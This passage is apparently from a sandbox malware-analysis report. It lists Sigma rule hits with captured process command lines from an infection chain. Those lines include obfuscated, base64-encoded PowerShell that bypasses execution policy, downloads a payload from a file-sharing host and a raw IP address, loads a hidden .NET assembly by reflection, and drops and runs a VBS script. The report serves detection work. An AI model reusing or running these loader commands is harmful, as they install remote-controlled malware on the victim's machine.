RU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7040, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , ProcessId: 7552, ProcessName: wscript.exe
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydw
                    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7040, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline", ProcessId: 7388, ProcessName: csc.exe
                    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7040, TargetFilename: C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS
                    Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+
                    Sigma detected: Usage Of Web Request Commands And Cmdlets
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+
                    Sigma detected: Use Short Name Path in Command Line
                    Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES883E.tmp" "c:\Users\user\AppData\Local\Temp\2c1bgmxj\CSC89B293BFADB94B3BBFCBA07F5ADB38CA.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES883E.tmp" "c:\Users\user\AppData\Local\Temp\2c1bgmxj\CSC89B293BFADB94B3BBFCBA07F5ADB38CA.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentProcessId: 7388, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES883E.tmp" "c:\Users\user\AppData\Local\Temp\2c1bgmxj\CSC89B293BFADB94B3BBFCBA07F5ADB38CA.TMP", ProcessId: 7404, ProcessName: cvtres.exe
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7040, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , ProcessId: 7552, ProcessName: wscript.exe
                    Sigma detected: Dynamic CSharp Compile Artefact
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7040, TargetFilename: C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))", CommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICA
                    Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex 